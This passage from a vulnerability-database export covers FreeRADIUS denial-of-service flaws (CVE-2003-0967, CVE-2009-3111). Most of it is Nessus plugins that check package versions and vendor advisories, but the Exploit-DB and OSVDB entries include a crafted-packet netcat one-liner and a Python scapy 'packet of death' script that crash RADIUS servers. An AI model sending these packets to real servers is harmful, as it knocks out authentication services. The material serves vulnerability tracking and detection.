value:\"p-cpe:/a:mandriva:linux:libfreeradius1-unixODBC\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.0\", reference:\"freeradius-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64freeradius1-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64freeradius1-devel-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64freeradius1-krb5-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64freeradius1-ldap-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64freeradius1-mysql-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64freeradius1-postgresql-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64freeradius1-unixODBC-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libfreeradius1-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libfreeradius1-devel-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libfreeradius1-krb5-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libfreeradius1-ldap-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libfreeradius1-mysql-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libfreeradius1-postgresql-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libfreeradius1-unixODBC-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-10-29T13:41:43", "references": ["http://support.novell.com/security/cve/CVE-2009-3111.html"], "pluginID": "49853", "description": "This update of freeradius fixes a remote denial-of-service bug in function rad_decode() which can be triggered by zero-length Tunnel-Password attributes to make radiusd crash. (CVE-2009-3111)", "edition": 2, "reporter": "Tenable", "published": "2010-10-11T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "nessus", "title": "SuSE 10 Security Update : freeradius (ZYPP Patch Number 6528)", "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3111"], "cpe": ["cpe:/o:suse:suse_linux"], "modified": "2012-05-17T00:00:00", "id": "SUSE_FREERADIUS-6528.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=49853", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(49853);\n script_version (\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2012/05/17 11:05:46 $\");\n\n script_cve_id(\"CVE-2009-3111\");\n\n script_name(english:\"SuSE 10 Security Update : freeradius (ZYPP Patch Number 6528)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of freeradius fixes a remote denial-of-service bug in\nfunction rad_decode() which can be triggered by zero-length\nTunnel-Password attributes to make radiusd crash. (CVE-2009-3111)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3111.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6528.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2012 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"freeradius-1.1.7-21.5.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"freeradius-devel-1.1.7-21.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-10-29T13:40:56", "references": ["http://support.novell.com/security/cve/CVE-2009-3111.html"], "pluginID": "41964", "edition": 2, "description": "This update of freeradius fixes a remote denial-of-service bug in function rad_decode() which can be triggered by zero-length Tunnel-Password attributes to make radiusd crash. (CVE-2009-3111)", "reporter": "Tenable", "published": "2009-10-02T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "nessus", "title": "SuSE9 Security Update : freeradius (YOU Patch Number 12507)", "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3111"], "cpe": ["cpe:/o:suse:suse_linux"], "modified": "2012-04-23T00:00:00", "id": "SUSE9_12507.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=41964", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(41964);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2012/04/23 18:21:33 $\");\n\n script_cve_id(\"CVE-2009-3111\");\n\n script_name(english:\"SuSE9 Security Update : freeradius (YOU Patch Number 12507)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of freeradius fixes a remote denial-of-service bug in\nfunction rad_decode() which can be triggered by zero-length\nTunnel-Password attributes to make radiusd crash. (CVE-2009-3111)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3111.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12507.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/10/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2012 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", reference:\"freeradius-1.0.5-2.21\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"freeradius-devel-1.0.5-2.21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-10-29T13:34:49", "references": ["http://freeradius.org/security.html", "http://www.nessus.org/u?3c3d64e5", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3111"], "pluginID": "43161", "description": "freeRADIUS Vulnerability Notifications reports :\n\n2009.09.09 v1.1.7 - Anyone who can send packets to the server can crash it by sending a Tunnel-Password attribute in an Access-Request packet. This vulnerability is not otherwise exploitable. We have released 1.1.8 to correct this vulnerability.\n\nThis issue is similar to the previous Tunnel-Password issue noted below. The vulnerable versions are 1.1.3 through 1.1.7. Version 2.x is not affected.", "edition": 2, "reporter": "Tenable", "published": "2009-12-15T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "nessus", "title": "FreeBSD : freeradius -- remote packet of death vulnerability (1b3f854b-e4bd-11de-b276-000d8787e1be)", "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3111"], "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:freeradius"], "modified": "2013-06-21T00:00:00", "id": "FREEBSD_PKG_1B3F854BE4BD11DEB276000D8787E1BE.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=43161", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2013 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43161);\n script_version(\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2013/06/21 23:43:36 $\");\n\n script_cve_id(\"CVE-2009-3111\");\n script_xref(name:\"EDB-ID\", value:\"9642\");\n\n script_name(english:\"FreeBSD : freeradius -- remote packet of death vulnerability (1b3f854b-e4bd-11de-b276-000d8787e1be)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"freeRADIUS Vulnerability Notifications reports :\n\n2009.09.09 v1.1.7 - Anyone who can send packets to the server can\ncrash it by sending a Tunnel-Password attribute in an Access-Request\npacket. This vulnerability is not otherwise exploitable. We have\nreleased 1.1.8 to correct this vulnerability.\n\nThis issue is similar to the previous Tunnel-Password issue noted\nbelow. The vulnerable versions are 1.1.3 through 1.1.7. Version 2.x is\nnot affected.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3111\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://freeradius.org/security.html\"\n );\n # http://www.freebsd.org/ports/portaudit/1b3f854b-e4bd-11de-b276-000d8787e1be.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3c3d64e5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:freeradius\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/09/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2013 Tenable Network Security, Inc.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"freeradius<1.1.8\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T20:54:03", "osvdbidlist": ["2850"], "references": [], "edition": 1, "description": "FreeRADIUS 0.x/1.1.x Tag Field Heap Corruption Vulnerability. CVE-2003-0967. Dos exploit for linux platform", "reporter": "Evgeny Legerov", "published": "2003-11-20T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "exploitdb", "title": "FreeRADIUS 0.x/1.1.x Tag Field Heap Corruption Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0967"], "modified": "2003-11-20T00:00:00", "id": "EDB-ID:23391", "href": "https://www.exploit-db.com/exploits/23391/", "sourceData": "source: http://www.securityfocus.com/bid/9079/info\r\n\r\nFreeRADIUS is prone to a heap-corruption vulnerability when handling of tag-field input. An attacker may be able to exploit this issue to deny service to legitimate users of a vulnerable FreeRADIUS server.\r\n\r\nThis issue was initially reported as a vulnerability in how the software handles 'Tunnel-Password' attribute in Access-Request packets, but the issue turns out to have wider scope, affecting tag-field input in general.\r\n\r\nThis vulnerability affects FreeRADIUS 0.4.0 through 0.9.2.\r\n\r\nUPDATE (September 9, 2009): This issue was fixed in 2003 but reintroduced later. FreeRADIUS 1.1.3 through 1.1.7 are also vulnerable.\r\n\r\nbash-2.05$ echo -ne \"\\x01\\x01\\x00\\x16\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x45\\x02\" | nc -vu -w1 <victim> <port>\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/23391/"}, {"lastseen": "2016-02-01T11:03:06", "osvdbidlist": [], "references": [], "description": "FreeRadius < 1.1.8 Zero-length Tunnel-Password DoS Exploit (CVE-2009-3111). CVE-2009-3111. Dos exploits for multiple platform", "edition": 1, "reporter": "Matthew Gillespie", "published": "2009-09-11T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "exploitdb", "title": "FreeRadius < 1.1.8 - Zero-length Tunnel-Password DoS Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3111"], "modified": "2009-09-11T00:00:00", "id": "EDB-ID:9642", "href": "https://www.exploit-db.com/exploits/9642/", "sourceData": "#!/usr/bin/env python\r\n# FreeRadius Packet Of Death\r\n# Matthew Gillespie 2009-09-11\r\n# Requires RadiusAttr http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py\r\n# http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/\r\n\r\nimport sys\r\nfrom scapy.all import IP,UDP,send,Radius,RadiusAttr\r\n\r\nif len(sys.argv) != 2:\r\n\tprint \"Usage: radius_killer.py <radiushost>\\n\"\r\n\tsys.exit(1)\r\n\r\nPoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \\\r\n\tRadius(code=1,authenticator=\"\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\",id=180)/ \\\r\n\tRadiusAttr(type=69,value=\"\",len=2)\r\n\r\nsend(PoD)\r\n\r\n# milw0rm.com [2009-09-11]\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9642/"}], "osvdb": [{"lastseen": "2017-04-28T13:19:57", "references": [], "edition": 1, "description": "## Vulnerability Description\nFreeRADIUS 0.9.2, and earlier, contains a flaw that may allow a remote denial of service. The issue is triggered when reception of a malformed packet sent to the service occurs, and will result in loss of availability for the service. It is possible to crash the service due to a NULL pointer dereference bug, which can be exploited by sending an \"Access-Request\" packet containing a \"Tunnel-Password\" attribute.\n## Technical Description\nThe vulnerability is caused due to a boundary error caused by mishandling of certain tagged RADIUS attributes (e.g. the \"Tunnel-Password\" attribute). This may cause a heap overflow, which can be exploited by sending malformed packets to the service. Successful exploitation requires that the packets originate from an IP address listed as a RADIUS client. It is possible to crash the service due to a NULL pointer dereference bug, which can be exploited by sending an \"Access-Request\" packet containing a \"Tunnel-Password\" attribute.\n\n## Solution Description\nUpgrade to version 0.9.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nFreeRADIUS 0.9.2, and earlier, contains a flaw that may allow a remote denial of service. The issue is triggered when reception of a malformed packet sent to the service occurs, and will result in loss of availability for the service. It is possible to crash the service due to a NULL pointer dereference bug, which can be exploited by sending an \"Access-Request\" packet containing a \"Tunnel-Password\" attribute.\n## Manual Testing Notes\nPoC CODE: The following command will crash the radiusd daemon\n\nbash-2.05$ echo -ne \n\"\\x01\\x01\\x00\\x16\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x45\\x02\" \n| nc -vu -w1 <victim> <port> \n\n## References:\nVendor Specific Solution URL: ftp://ftp.freeradius.org/pub/radius/freeradius-0.9.3.tar.gz\n[Secunia Advisory ID:10271](https://secuniaresearch.flexerasoftware.com/advisories/10271/)\n[CVE-2003-0967](https://vulners.com/cve/CVE-2003-0967)\nBugtraq ID: 9079\n", "reporter": "OSVDB", "published": "2003-11-20T03:12:14", "title": "FreeRADIUS Tagged Attribute Handling DoS", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Advanced Server", "version": "3.0", "operator": "eq"}, {"name": "FreeRADIUS", "version": "0.9.1", "operator": "eq"}, {"name": "FreeRADIUS", "version": "0.8", "operator": "eq"}, {"name": "FreeRADIUS", "version": "0.5", "operator": "eq"}, {"name": "Enterprise Server", "version": "3.0", "operator": "eq"}, {"name": "FreeRADIUS", "version": "0.8.1", "operator": "eq"}, {"name": "FreeRADIUS", "version": "0.9", "operator": "eq"}, {"name": "FreeRADIUS", "version": "0.4", "operator": "eq"}, {"name": "FreeRADIUS", "version": "0.9.2", "operator": "eq"}], "cvelist": ["CVE-2003-0967"], "modified": "2003-11-20T03:12:14", "href": "https://vulners.com/osvdb/OSVDB:2850", "id": "OSVDB:2850", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "redhat": [{"lastseen": "2017-08-02T16:57:45", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "enchantments_done": [], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "any", "packageVersion": "0.9.3-1", "arch": "ia64", "packageName": "freeradius", "packageFilename": "freeradius-0.9.3-1.ia64.rpm", "operator": "lt"}], "description": "FreeRADIUS is an Internet authentication daemon, which implements the\nRADIUS protocol. It allows Network Access Servers (NAS boxes) to perform\nauthentication for dial-up users.\n\nThe rad_decode function in FreeRADIUS 0.9.2 and earlier allows remote\nattackers to cause a denial of service (crash) via a short RADIUS string\nattribute with a tag, which causes memcpy to be called with a -1 length\nargument, as demonstrated using the Tunnel-Password attribute. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the name\nCAN-2003-0967 to this issue.\n \nUsers of FreeRADIUS are advised to upgrade to these erratum packages\ncontaining FreeRADIUS 0.9.3 which is not vulnerable to these issues.", "reporter": "RedHat", "published": "2003-12-10T05:00:00", "title": "(RHSA-2003:386) freeradius security update", "type": "redhat", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2003-0967"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-07-29T20:27:18", "href": "https://access.redhat.com/errata/RHSA-2003:386", "id": "RHSA-2003:386", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-09T07:20:40", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "enchantments_done": [], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageName": "freeradius-mysql", "packageFilename": "freeradius-mysql-1.1.3-1.5.el5_4.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageName": "freeradius-unixODBC", "packageFilename": "freeradius-unixODBC-1.1.3-1.5.el5_4.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageName": "freeradius-postgresql", "packageFilename": "freeradius-postgresql-1.1.3-1.5.el5_4.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageName": "freeradius", "packageFilename": "freeradius-1.1.3-1.5.el5_4.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageName": "freeradius", "packageFilename": "freeradius-1.1.3-1.5.el5_4.src.rpm", "arch": "src", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageName": "freeradius-unixODBC", "packageFilename": "freeradius-unixODBC-1.1.3-1.5.el5_4.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageName": "freeradius-postgresql", "packageFilename": "freeradius-postgresql-1.1.3-1.5.el5_4.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageName": "freeradius-mysql", "packageFilename": "freeradius-mysql-1.1.3-1.5.el5_4.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageName": "freeradius", "packageFilename": "freeradius-1.1.3-1.5.el5_4.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageName": "freeradius-mysql", "packageFilename": "freeradius-mysql-1.1.3-1.5.el5_4.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageName": "freeradius-postgresql", "packageFilename": "freeradius-postgresql-1.1.3-1.5.el5_4.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageName": "freeradius-unixODBC", "packageFilename": "freeradius-unixODBC-1.1.3-1.5.el5_4.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageName": "freeradius", "packageFilename": "freeradius-1.1.3-1.5.el5_4.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageName": "freeradius-mysql", "packageFilename": "freeradius-mysql-1.1.3-1.5.el5_4.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageName": 